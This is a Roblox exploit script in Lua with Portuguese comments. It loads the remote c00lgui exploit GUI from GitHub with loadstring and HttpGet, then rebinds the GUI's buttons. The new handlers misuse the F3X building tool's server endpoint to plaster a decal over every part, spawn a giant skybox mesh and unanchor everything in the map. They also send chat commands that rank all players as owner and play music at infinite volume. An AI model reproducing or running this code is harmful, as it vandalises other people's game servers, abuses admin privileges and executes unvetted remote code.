-- bipolargui v4 reborn by você - AMARELO IMEDIATO + DECAL/SKYBOX/MUSIC/DISCO/RANK/UNANCHOR CUSTOM + FUNÇÕES MORTAS 💛🚀👻🎶🕺👑💥 loadstring(game:HttpGet("https://raw.githubusercontent.com/MiRw3b/c00lgui-v3rx/main/c00lguiv3rx.lua"))() -- Espera a GUI nascer e aplica tudo instantâneo repeat wait() until game.CoreGui:FindFirstChild("CoolGui") wait(0.5) -- Tempo pra tudo carregar (botões + conexões) local coolgui = game.CoreGui.CoolGui local amarelo = Color3.new(1, 1, 0) -- Amarelo top 💛 -- === MUDA O TÍTULO PRA BIPOLARGUI v4 REBORN 😎 === local tituloAlterado = false for _, obj in pairs(coolgui:GetDescendants()) do if obj:IsA("TextLabel") or obj:IsA("TextButton") then if string.find(string.lower(obj.Text), "coolgui") or string.find(string.lower(obj.Text), "c00lgui") or string.find(string.lower(obj.Text), "v3rx") then obj.Text = "bipolargui v4 reborn" tituloAlterado = true end end end if tituloAlterado then print("🔥 Título mudado pra: bipolargui v4 reborn 💀😈") else warn("⚠️ Não encontrou o título automático, ajusta manual se precisar!") end -- Amarelo IMEDIATO em TODAS bordas/linhas for _, obj in pairs(coolgui:GetDescendants()) do if obj:IsA("GuiObject") and obj.BorderSizePixel > 0 then obj.BorderColor3 = amarelo end end -- Botões pra MATAR função (só o que a gente não quer customizar) local botoes_mortos = { "Mesh Disco" -- Os outros são customizados abaixo! } for _, btn in pairs(coolgui:GetDescendants()) do if btn:IsA("TextButton") then for _, nome in pairs(botoes_mortos) do if btn.Text == nome or string.find(btn.Text:lower(), nome:lower()) then for _, event in pairs({"MouseButton1Click", "MouseButton1Down", "Activated"}) do if btn[event] then local conns = getconnections(btn[event]) for _, conn in pairs(conns) do conn:Disable() conn:Disconnect() end btn[event]:Connect(function() end) end end print("🔥 Função MORTA: " .. btn.Text) break end end end end -- === TEU SCRIPT DECAL CUSTOM === local Players = game:GetService("Players") local player = Players.LocalPlayer local warned_decal = false local decalId = "99714471408048" local function findF3X() local tool = nil local char = player.Character or player.CharacterAdded:Wait() for _, item in pairs(char:GetChildren()) do if item:IsA("Tool") and item:FindFirstChild("SyncAPI") then tool = item; break end end if not tool then for _, item in pairs(player.Backpack:GetChildren()) do if item:IsA("Tool") and item:FindFirstChild("SyncAPI") then tool = item; break end end end return tool end local function invokeF3X(args) local tool = findF3X() if not tool then if not warned_decal then warn("⚠️ Equipe o F3X Building Tool!") warned_decal = true end return end local syncAPI = tool.SyncAPI syncAPI.ServerEndpoint:InvokeServer(unpack(args)) end local function createDecal(part, face, textureId) invokeF3X({"SetLocked", {part}, false}) invokeF3X({"CreateTextures", {{Part = part, Face = face, TextureType = "Decal"}}}) invokeF3X({"SyncTexture", {{Part = part, Face = face, TextureType = "Decal", Texture = "rbxassetid://" .. textureId}}}) end local function spamDecals() warned_decal = false for _, part in ipairs(workspace:GetDescendants()) do if part:IsA("BasePart") then spawn(function() for _, face in ipairs(Enum.NormalId:GetEnumItems()) do createDecal(part, face, decalId) end end) end end print("🔥 Spam do TEU decal iniciado! 💀") spawn(function() wait(2) local customTex = "rbxassetid://" .. decalId local count = 0 for _, obj in ipairs(workspace:GetDescendants()) do if obj:IsA("Decal") and obj.Texture ~= customTex then obj:Destroy() count += 1 end end print("🧹 Removidos " .. count .. " decals coolkidd! Só o teu! 💛") end) end -- === TEU SCRIPT SKYBOX CUSTOM === local warned_sky = false local function getF3X_sky() local plr = game:GetService("Players").LocalPlayer for _, tool in pairs((plr.Character or plr.CharacterAdded:Wait()):GetChildren()) do if tool:IsA("Tool") and tool:FindFirstChild("SyncAPI") then return tool end end for _, tool in pairs(plr.Backpack:GetChildren()) do if tool:IsA("Tool") and tool:FindFirstChild("SyncAPI") then return tool end end if not warned_sky then warn("F3X não encontrado pro Skybox! Equipa o tool.") warned_sky = true end return nil end local function createSky() local tool = getF3X_sky() if not tool then return end local syncAPI = tool.SyncAPI local server = syncAPI.ServerEndpoint if workspace:FindFirstChild("sky") then server:InvokeServer("Remove", {workspace.sky}) wait(0.5) end local pos = game.Players.LocalPlayer.Character.HumanoidRootPart.Position server:InvokeServer("CreatePart", "Normal", CFrame.new(pos), workspace) wait(0.2) local part = workspace:FindFirstChild("Part") if not part then warn("Part sky não criado!"); return end server:InvokeServer("SetName", {part}, "sky") wait(0.2) local sky = workspace:FindFirstChild("sky") if not sky then warn("Sky não renamed!"); return end server:InvokeServer("SyncCollision", {{Part = sky, CanCollide = false}}) wait(0.1) server:InvokeServer("SetLocked", {sky}, true) wait(0.1) server:InvokeServer("CreateMeshes", {{Part = sky}}) wait(0.1) server:InvokeServer("SyncMesh", {{Part = sky, MeshType = Enum.MeshType.FileMesh}}) wait(0.1) server:InvokeServer("SyncMesh", {{Part = sky, MeshId = "rbxassetid://111891702759441"}}) wait(0.1) server:InvokeServer("SyncMesh", {{Part = sky, Scale = Vector3.new(5000, 5000, 5000)}}) wait(0.1) server:InvokeServer("SyncMesh", {{Part = sky, TextureId = "rbxassetid://99714471408048"}}) wait(0.1) print("Skybox com teu ID 99714471408048 aplicada CERTINHO! 🔥👻") end -- === SOBRESCREVE "Decal" === for _, btn in pairs(coolgui:GetDescendants()) do if btn:IsA("TextButton") and (btn.Text == "Decal" or string.find(btn.Text:lower(), "decal")) then for _, event in pairs({"MouseButton1Click", "MouseButton1Down", "Activated"}) do if btn[event] then local conns = getconnections(btn[event]) for _, conn in pairs(conns) do conn:Disable() conn:Disconnect() end btn[event]:Connect(function() end) end end btn.MouseButton1Click:Connect(spamDecals) print("😈 'Decal' = TEU CUSTOM!") break end end -- === SOBRESCREVE "Set Skybox" === for _, btn in pairs(coolgui:GetDescendants()) do if btn:IsA("TextButton") and (btn.Text == "Set Skybox" or string.find(btn.Text:lower(), "skybox")) then for _, event in pairs({"MouseButton1Click", "MouseButton1Down", "Activated"}) do if btn[event] then local conns = getconnections(btn[event]) for _, conn in pairs(conns) do conn:Disable() conn:Disconnect() end btn[event]:Connect(function() end) end end btn.MouseButton1Click:Connect(createSky) print("😈 'Set Skybox' = TEU CUSTOM!") break end end -- === SOBRESCREVE "Play Music" === for _, btn in pairs(coolgui:GetDescendants()) do if btn:IsA("TextButton") and (btn.Text == "Play Music" or string.find(btn.Text:lower(), "play music")) then for _, event in pairs({"MouseButton1Click", "MouseButton1Down", "Activated"}) do if btn[event] then local conns = getconnections(btn[event]) for _, conn in pairs(conns) do conn:Disable() conn:Disconnect() end btn[event]:Connect(function() end) end end btn.MouseButton1Click:Connect(function() local comando = ";music 1846368080 ;volume inf ;pitch 0.92" pcall(function() local textChatService = game:GetService("TextChatService") local textChannels = textChatService:FindFirstChild("TextChannels") if textChannels then local rbxlobby = textChannels:FindFirstChild("RBXGeneral") or textChannels:GetChildren()[1] if rbxlobby then rbxlobby:SendAsync(comando) print("🎶 Music comando enviado!") return end end end) pcall(function() local chatRemote = game:GetService("ReplicatedStorage"):FindFirstChild("DefaultChatSystemChatEvents"):FindFirstChild("SayMessageRequest") if chatRemote then chatRemote:FireServer(comando, "All") print("🎶 Music comando enviado (antigo)!") return end end) end) print("😈 'Play Music' = TEU COMANDO!") break end end -- === SOBRESCREVE "Disco Fog" === for _, btn in pairs(coolgui:GetDescendants()) do if btn:IsA("TextButton") and (btn.Text == "Disco Fog" or string.find(btn.Text:lower(), "disco fog")) then for _, event in pairs({"MouseButton1Click", "MouseButton1Down", "Activated"}) do if btn[event] then local conns = getconnections(btn[event]) for _, conn in pairs(conns) do conn:Disable() conn:Disconnect() end btn[event]:Connect(function() end) end end btn.MouseButton1Click:Connect(function() local comando = ";disco ;unfog ;time" pcall(function() local textChatService = game:GetService("TextChatService") local textChannels = textChatService:FindFirstChild("TextChannels") if textChannels then local rbxlobby = textChannels:FindFirstChild("RBXGeneral") or textChannels:GetChildren()[1] if rbxlobby then rbxlobby:SendAsync(comando) print("🕺 Disco comando enviado!") return end end end) pcall(function() local chatRemote = game:GetService("ReplicatedStorage"):FindFirstChild("DefaultChatSystemChatEvents"):FindFirstChild("SayMessageRequest") if chatRemote then chatRemote:FireServer(comando, "All") print("🕺 Disco comando enviado (antigo)!") return end end) end) print("😈 'Disco Fog' = TEU COMANDO!") break end end -- === SOBRESCREVE "Become Owner [PS]" pra "Rank All Owner" === for _, btn in pairs(coolgui:GetDescendants()) do if btn:IsA("TextButton") and (btn.Text == "Become Owner [PS]" or string.find(btn.Text:lower(), "become owner")) then btn.Text = "Rank All Owner" for _, event in pairs({"MouseButton1Click", "MouseButton1Down", "Activated"}) do if btn[event] then local conns = getconnections(btn[event]) for _, conn in pairs(conns) do conn:Disable() conn:Disconnect() end btn[event]:Connect(function() end) end end btn.MouseButton1Click:Connect(function() local comando = ";rank all owner" pcall(function() local textChatService = game:GetService("TextChatService") local textChannels = textChatService:FindFirstChild("TextChannels") if textChannels then local rbxlobby = textChannels:FindFirstChild("RBXGeneral") or textChannels:GetChildren()[1] if rbxlobby then rbxlobby:SendAsync(comando) print("👑 Comando ';rank all owner' enviado!") return end end end) pcall(function() local chatRemote = game:GetService("ReplicatedStorage"):FindFirstChild("DefaultChatSystemChatEvents"):FindFirstChild("SayMessageRequest") if chatRemote then chatRemote:FireServer(comando, "All") print("👑 Comando ';rank all owner' enviado (antigo)!") return end end) end) print("😈 'Become Owner [PS]' vira 'Rank All Owner' + COMANDO!") break end end -- === SOBRESCREVE "Unanchor All" COM TEU SCRIPT CUSTOM === local warned_unanchor = false local function findBuildingTools() local buildingTools = nil for _, item in pairs(player.Character:GetChildren()) do if item:IsA("Tool") and item:FindFirstChild("SyncAPI") then buildingTools = item break end end if not buildingTools then for _, item in pairs(player.Backpack:GetChildren()) do if item:IsA("Tool") and item:FindFirstChild("SyncAPI") then buildingTools = item break end end end return buildingTools end local function invoke_unanchor(args) local tool = findBuildingTools() if not tool then if not warned_unanchor then warn("F3X Building Tool não encontrado! Equipa na char ou backpack.") warned_unanchor = true end return end local syncAPI = tool:FindFirstChild("SyncAPI") if not syncAPI then return end local serverEndpoint = syncAPI:FindFirstChild("ServerEndpoint") if not serverEndpoint then return end serverEndpoint:InvokeServer(unpack(args)) end local function unanchor(part) local args = { [1] = "SyncAnchor", [2] = { [1] = { ["Part"] = part, ["Anchored"] = false } } } invoke_unanchor(args) end local function unanchorAll() print("Iniciando unanchor all... Vai cair tudo! 💥") local count = 0 for _, obj in pairs(workspace:GetDescendants()) do if obj:IsA("BasePart") then spawn(function() unanchor(obj) count = count + 1 end) wait() end end print("Unanchor all completo! " .. count .. " parts unanchored! 🔥") end for _, btn in pairs(coolgui:GetDescendants()) do if btn:IsA("TextButton") and (btn.Text == "Unanchor All" or string.find(btn.Text:lower(), "unanchor all")) then -- Mata original for _, event in pairs({"MouseButton1Click", "MouseButton1Down", "Activated"}) do if btn[event] then local conns = getconnections(btn[event]) for _, conn in pairs(conns) do conn:Disable() conn:Disconnect() end btn[event]:Connect(function() end) end end -- Teu unanchor custom btn.MouseButton1Click:Connect(unanchorAll) print("😈 'Unanchor All' = TEU SCRIPT CUSTOM (tudo cai com estilo)! 💥") break end end print("bipolargui v4 reborn FINALIZADA: TUDO TEU CUSTOM + Unanchor All novo! 💀👻🎶🕺👑💥💛")